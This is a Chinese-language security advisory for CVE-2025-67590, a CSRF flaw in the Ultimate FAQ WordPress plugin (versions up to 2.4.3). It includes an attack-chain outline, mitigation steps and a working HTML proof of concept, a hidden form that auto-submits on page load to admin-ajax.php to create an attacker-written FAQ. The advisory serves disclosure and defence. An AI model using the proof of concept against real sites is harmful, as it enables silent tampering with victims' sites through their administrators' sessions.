CVE-2025-67590 WordPress Ultimate FAQ插件CSRF跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-67590

漏洞类型

CSRF跨站请求伪造

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Rustaurius Ultimate FAQ (WordPress Plugin)

漏洞概述

CVE-2025-67590是WordPress插件Ultimate FAQ中的一个跨站请求伪造（CSRF）漏洞。该漏洞存在于插件的2.4.3及以下所有版本中，攻击者可以利用此漏洞诱骗已登录的网站管理员在不知情的情况下执行非预期的操作。由于WordPress插件通常具有较高的管理权限，CSRF漏洞可能导致更严重的后果，包括数据篡改、设置修改甚至进一步利用其他漏洞。该漏洞由Patchstack团队的安全研究员[email protected]发现并报告，CVSS评分为4.3，属于中等严重程度。漏洞的利用需要用户交互，攻击者需要诱骗管理员点击恶意链接或访问包含恶意表单的网页。

技术细节

跨站请求伪造（CSRF）是一种利用用户已认证的身份发起恶意请求的攻击方式。在WordPress Ultimate FAQ插件中，该漏洞源于缺少适当的CSRF令牌验证。攻击者可以构造一个恶意网页，包含自动提交的表单，该表单指向WordPress网站的admin-ajax.php或其他管理端点。当已登录的管理员访问该恶意页面时，浏览器会自动发送带有有效会话Cookie的请求，导致攻击者预定义的命令被执行。由于插件在处理管理操作时未验证请求的来源和有效性，攻击者可以代表管理员执行如创建、修改或删除FAQ内容等操作。防御此类漏洞需要在所有状态变更操作中实施CSRF令牌验证，并验证HTTP Referer头或使用SameSite Cookie属性。

攻击链分析

STEP 1

步骤1

攻击者创建恶意网页，包含针对WordPress Ultimate FAQ插件管理功能的自动提交表单

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或恶意网站诱骗已登录的管理员访问恶意页面

STEP 3

步骤3

受害者的浏览器自动向目标网站发送带有有效认证Cookie的POST请求

STEP 4

步骤4

WordPress插件处理请求时未正确验证CSRF令牌，直接执行攻击者指定的操作

STEP 5

步骤5

攻击成功，FAQ内容被创建、修改或删除，管理员对此毫不知情

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-67590 -->
<!-- This PoC demonstrates the CSRF vulnerability in Ultimate FAQ plugin -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC - Ultimate FAQ</title>
</head>
<body>
    <h1>CSRF PoC for CVE-2025-67590</h1>
    <p>Ultimate FAQ Plugin <= 2.4.3 CSRF Vulnerability</p>
    
    <!-- Auto-submit form targeting WordPress admin-ajax.php -->
    <form id="csrfForm" action="http://target-site.com/wp-admin/admin-ajax.php" method="POST" style="display:none;">
        <input type="hidden" name="action" value="ewd_uqp_save_faq" />
        <input type="hidden" name="faq_question" value="Malicious FAQ Created via CSRF" />
        <input type="hidden" name="faq_answer" value="This FAQ was created by an attacker via CSRF attack" />
        <input type="hidden" name="post_id" value="0" />
        <input type="hidden" name="nonce" value="" />
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
        console.log('CSRF request sent');
    </script>
    
    <p>If you see this message, the form has been submitted.</p>
</body>
</html>

影响范围

Ultimate FAQ <= 2.4.3 (所有版本)

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1）暂时禁用Ultimate FAQ插件；2）使用WordPress安全插件（如Wordfence）添加CSRF保护层；3）加强对管理员账户的安全意识培训，提醒不要点击可疑链接；4）限制管理员账户的使用范围，避免从公共网络访问管理后台；5）实施严格的CSP（内容安全策略）以减少跨域请求的风险。